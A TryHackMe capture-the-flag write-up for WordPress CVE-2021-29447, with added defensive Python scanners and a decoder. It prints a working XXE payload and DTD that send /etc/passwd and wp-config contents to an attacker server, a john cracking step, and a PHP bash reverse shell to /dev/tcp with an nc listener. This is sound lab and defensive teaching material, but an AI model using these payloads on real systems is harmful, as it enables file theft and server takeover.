TryHackMe Wordpress: CVE-2021–29447 Writeup

Imdad Miran
4 min read · Aug 29, 2021
Source: TryHackMe

Hi, Hackers!!! Today we will solve the TryHackMe room Wordpress: CVE-2021–29447. This room is about an XXE vulnerability in Wordpress. The room was created by stuxnet. Without wasting time, let’s get into action.

Introduction

XXE is short for XML External Entity. This vulnerability takes advantage of a poorly configured XML parser. If we can use XXE properly, we can read files that we are not supposed to read. XXE lets us declare external entities, enabling attacks on applications that parse XML supplied in their input.

The CVE we are learning about can be exploited if the CMS runs on PHP 8 and the attacker has permission to upload media files.

Impact

  • Arbitrary File Disclosure: The contents of any file on the host’s file system can be retrieved.
  • Server-Side Request Forgery: HTTP requests can be made on behalf of the Wordpress installation.

Exploiting the vulnerability

Credentials:

user: test-corp
password: test

The above user has permission to upload media files. First, create a file named poc.wav with nano.

nano poc.wav

Then put the following command in the file (poc.wav is a small shell script that writes the actual payload).

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSERVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

You also have to create a .dtd file, because the command above makes the target download a .dtd file from your server. The name must match the one you specified above. Create NAMEEVIL.dtd with nano and put the following code in it.

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >
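As an added example (not code from the room or from the TryHackMe author), here is a small Python checker that parses the RIFF chunk list of an uploaded WAV, pulls out the iXML chunk that the payload above hides its DTD in, and rejects the file when that chunk contains DOCTYPE or ENTITY declarations. That is the check an upload handler, or a scanner run over an existing media library, would perform. The sample WAV files, including the host name attacker.invalid, are constructed inside the block.

```python
"""Inspect a WAV (RIFF) upload for an iXML chunk carrying DTD/entity markup.

Added example for this writeup, not code from the room or from WordPress.
It walks the RIFF chunk list the way a metadata reader would, extracts the
iXML chunk and reports whether the XML inside declares a DOCTYPE or ENTITY
(the precondition for the XXE this CVE abuses). The sample files below are
constructed in memory, not taken from the room.
"""
import re
import struct
from typing import Iterator, Optional, Tuple

# Markup that has no business in an iXML metadata chunk.
SUSPICIOUS = re.compile(rb"<!DOCTYPE|<!ENTITY|SYSTEM\s+['\"]|PUBLIC\s+['\"]", re.IGNORECASE)


def riff_chunks(data: bytes) -> Iterator[Tuple[bytes, bytes]]:
    """Yield (fourcc, payload) for each chunk in a RIFF/WAVE container.

    Slicing tolerates truncated or oversized length fields, because a hostile
    file may lie about chunk sizes to trip up a naive parser.
    """
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    pos = 12
    while pos + 8 <= len(data):
        fourcc = data[pos:pos + 4]
        (size,) = struct.unpack("<I", data[pos + 4:pos + 8])
        yield fourcc, data[pos + 8:pos + 8 + size]
        pos += 8 + size + (size & 1)   # chunks are word-aligned: odd sizes get a pad byte


def ixml_chunk(data: bytes) -> Optional[bytes]:
    """Return the raw iXML chunk payload, or None if the file has none."""
    for fourcc, payload in riff_chunks(data):
        if fourcc == b"iXML":
            return payload
    return None


def inspect_wav(data: bytes) -> dict:
    """Classify a WAV file: not RIFF, no iXML, benign iXML, or iXML with DTD markup."""
    try:
        xml = ixml_chunk(data)
    except ValueError as exc:
        return {"verdict": "reject", "reason": str(exc)}
    if xml is None:
        return {"verdict": "ok", "reason": "no iXML chunk"}
    m = SUSPICIOUS.search(xml)
    if m:
        return {"verdict": "reject",
                "reason": "iXML chunk contains " + m.group(0).decode(errors="replace")}
    return {"verdict": "ok", "reason": "iXML chunk without DTD markup"}


def build_wav(ixml: Optional[bytes] = None) -> bytes:
    """Construct a minimal WAV (fmt + empty data, optional iXML chunk) for testing."""
    fmt = struct.pack("<HHIIHH", 1, 1, 8000, 16000, 2, 16)   # PCM, mono, 8 kHz, 16-bit
    chunks = [b"fmt " + struct.pack("<I", len(fmt)) + fmt,
              b"data" + struct.pack("<I", 0)]
    if ixml is not None:
        padded = ixml + (b"\x00" if len(ixml) & 1 else b"")
        chunks.append(b"iXML" + struct.pack("<I", len(ixml)) + padded)
    body = b"WAVE" + b"".join(chunks)
    return b"RIFF" + struct.pack("<I", len(body)) + body


# Constructed samples: a clean recording and one carrying the same kind of
# DOCTYPE/parameter-entity declaration as the writeup's payload.wav.
CLEAN_WAV = build_wav(b'<?xml version="1.0"?><BWFXML><PROJECT>demo</PROJECT></BWFXML>')
HOSTILE_WAV = build_wav(b'<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '
                        b"'http://attacker.invalid/evil.dtd'>%remote;]>")

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_WAV), ("hostile", HOSTILE_WAV)):
        print(name, inspect_wav(blob))
```

The parser deliberately does not hand the chunk to an XML library at all: the decision is made on the raw bytes, so a file cannot exploit the checker the same way it exploits the target.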

Now give poc.wav execute permission and run it. It will create payload.wav, which we will upload to the host.

chmod +x poc.wav
./poc.wav

Before uploading the payload to the Wordpress site, start a PHP web server on your host.

php -S your_ip:port

Start the server in the directory where you saved the .dtd file. If you gave the correct file path, the target fetches a URL from your server whose p parameter holds the file contents, base64-encoded (and, with the filter chain above, deflated first); the request shows up in the PHP server's log. You can decode the output with PHP. Create a .php file with the following code:

nano revshell.php
<?php echo zlib_decode(base64_decode('base64here')); ?>

You can also decode it on the command line, but note that with the zlib.deflate filter in the chain this only undoes the base64 layer:

echo "base64code" | base64 -d

The filter chain also works without the compression step, in which case the output is plain base64:

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >
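Added Python example, not code from the room, that decodes the p parameter of the request the target sends back, covering both filter chains on this page: the zlib.deflate + base64 variant earlier and the base64-only one just above. Whoever reads the listener output (or, on the defending side, a proxy or egress log that recorded the same request) sees only a base64 blob; PHP's zlib.deflate filter emits raw DEFLATE data with no zlib header, which is why zlib_decode() in PHP works, why `base64 -d` alone does not, and why Python needs wbits=-15 here. The log lines, the IP address and the file contents are constructed for the example.

```python
"""Recover the file contents carried in the `p` parameter of the callback request.

Added example for this writeup, not code from the room. It undoes the two
php://filter chains shown on the page. The sample log lines approximate the
shape `php -S` prints and are constructed, not a real capture.
"""
import base64
import re
import zlib
from urllib.parse import unquote_to_bytes

# The p= parameter as it appears in a request line such as "GET /?p=... HTTP/1.1".
P_PARAM = re.compile(r"[?&]p=([^ &\s]+)")


def extract_p(line: str) -> str:
    """Pull the raw `p` value out of a request line or access-log line."""
    m = P_PARAM.search(line)
    if not m:
        raise ValueError("no p= parameter in line")
    return m.group(1)


def decode_p(value: str, deflated: bool = True) -> bytes:
    """Undo the filter chain: URL escaping, base64, then raw DEFLATE if it was used."""
    raw = unquote_to_bytes(value)                       # handles %2B/%3D if the logger escaped them
    raw = base64.b64decode(raw + b"=" * (-len(raw) % 4))  # re-pad in case padding was stripped
    if not deflated:
        return raw                                      # base64-only DTD variant
    return zlib.decompress(raw, -15)                    # -15: raw DEFLATE, no zlib/gzip header


def recover(line: str, deflated: bool = True) -> bytes:
    """Convenience wrapper: log line in, plaintext file contents out."""
    return decode_p(extract_p(line), deflated)


def encode_like_filter(content: bytes, deflated: bool = True) -> str:
    """Mimic php://filter output so the sample below can be built offline."""
    if deflated:
        c = zlib.compressobj(wbits=-15)                 # raw DEFLATE, as zlib.deflate produces
        content = c.compress(content) + c.flush()
    return base64.b64encode(content).decode()


# Constructed sample: a small passwd-style file and the request line each DTD
# variant would cause the target to send.
SAMPLE_CONTENT = (b"root:x:0:0:root:/root:/bin/bash\n"
                  b"www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n")
SAMPLE_LOG_DEFLATED = ("[Sun Aug 29 12:00:00 2021] 10.10.10.10:45210 [404]: GET /?p="
                       + encode_like_filter(SAMPLE_CONTENT) + " - No such file or directory")
SAMPLE_LOG_PLAIN = ("[Sun Aug 29 12:00:01 2021] 10.10.10.10:45212 [404]: GET /?p="
                    + encode_like_filter(SAMPLE_CONTENT, deflated=False) + " - No such file or directory")

if __name__ == "__main__":
    print(recover(SAMPLE_LOG_DEFLATED).decode())
    print(recover(SAMPLE_LOG_PLAIN, deflated=False).decode())
```

The deflated flag is explicit rather than guessed from the bytes: arbitrary text can look like the start of a valid raw DEFLATE stream, so auto-detection would sometimes return garbage instead of failing.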

Ready Set Go

1. Use the vulnerability CVE-2021–29447 to read the wordpress configuration file.

[Screenshot: Wordpress Config File]

Answer: No Answer Needed.

2. Based on the results of #1, what is the name of the database for WordPress?

Answer: Read the config file.

3. Based on the results of #1, what are the credentials you found?

Answer: Decode the base64 encoded output you received.

4. Enumerate and identify what is the dbms installed on the server?

[Screenshot: Connect with db]

Answer: I think you know.

5. Based on the results of #4, what is the dbms version installed on the server?

[Screenshot: Find Version]

Answer:

select VERSION();

6. Based on the results of #4, what port is the dbms running on?

[Screenshot: Find Port]

Answer:

show global variables like 'PORT';

7. Compromise the dbms. What is the encrypted password located in the wordpress users table with id 1?

[Screenshots: Databases, Tables, Users]

You will get the hash of user id 1. To identify the hash type, you can use hash-identifier. Save the hash to key.hash and crack it with john.

john key.hash --wordlist=......./rockyou.txt

Answer: Get the hash.

8. Based on the results of #7, What is the password in plain text?

Answer: Crack the hash with john.

9. Compromise the machine and locate flag.txt.

Answer: Create a reverse shell using php.

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/your_ip/1234 0>&1'");
?>

Go to the Themes tab and try to upload the reverse shell. Wordpress will try to install it as a theme and fail, but the file ends up in the media library.

[Screenshot: Media Library]

Click on the file and get the path of the file.

[Screenshot: File path]

Before running the file, start a netcat listener on your machine.

nc -lvnp 1234

[Screenshot: We are in]

And Bang! We are in. Let’s find the flag.
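The theme-upload trick above leaves revshell.php under wp-content/uploads, a tree that should hold nothing but media. As an added example (not code from the room or from WordPress), the following Python scanner walks such an uploads tree and reports files that carry a PHP extension or contain a PHP open tag regardless of extension, so an image with code appended is caught as well. The sample tree is built in a temporary directory from constructed files; the paths are illustrative, not the room's.

```python
"""Find PHP code that has landed in a WordPress media library.

Added example for this writeup, not code from the room or from WordPress.
The sample tree below is constructed in a temporary directory.
"""
import os
import re
import tempfile
from typing import List, Tuple

PHP_EXTENSIONS = {".php", ".phtml", ".php3", ".php5", ".php7", ".phar"}
PHP_OPEN_TAG = re.compile(rb"<\?php\b|<\?=")


def scan_uploads(root: str) -> List[Tuple[str, str]]:
    """Return (path relative to root, reason) for every suspicious file under root."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            ext = os.path.splitext(name)[1].lower()
            if ext in PHP_EXTENSIONS:
                findings.append((rel, "php extension in uploads tree"))
                continue
            with open(full, "rb") as fh:
                body = fh.read(1 << 20)   # first MiB: enough for a tag near the top or appended to a small image
            if PHP_OPEN_TAG.search(body):
                findings.append((rel, "php open tag inside a non-php file"))
    return sorted(findings)


def flagged_names(root: str) -> List[str]:
    """Basenames of the flagged files, in sorted path order."""
    return [os.path.basename(path) for path, _ in scan_uploads(root)]


def build_sample_uploads() -> str:
    """Construct an uploads tree: two genuine media files and two planted scripts."""
    root = tempfile.mkdtemp(prefix="uploads-")
    month = os.path.join(root, "2021", "08")
    os.makedirs(month)
    files = {
        "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,          # JPEG header, nothing else
        "clip.wav": b"RIFF\x04\x00\x00\x00WAVE",                  # minimal RIFF header
        "revshell.php": b"<?php echo 'placeholder'; ?>",         # stands in for the uploaded shell (benign body)
        "cover.jpg": b"\xff\xd8\xff\xe0" + b"<?php echo 1; ?>",  # image header with code appended
    }
    for name, content in files.items():
        with open(os.path.join(month, name), "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for path, reason in scan_uploads(build_sample_uploads()):
        print(path + ": " + reason)
```

Run periodically or from a post-upload hook, a scan like this catches the artefact of this room's final step even when the web server has been told never to execute PHP under uploads, which is the other half of the mitigation.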

[Screenshot: Flag]

At last, we found the flag. And this is where I say goodbye. See you in the next post. Happy Hacking!!!!
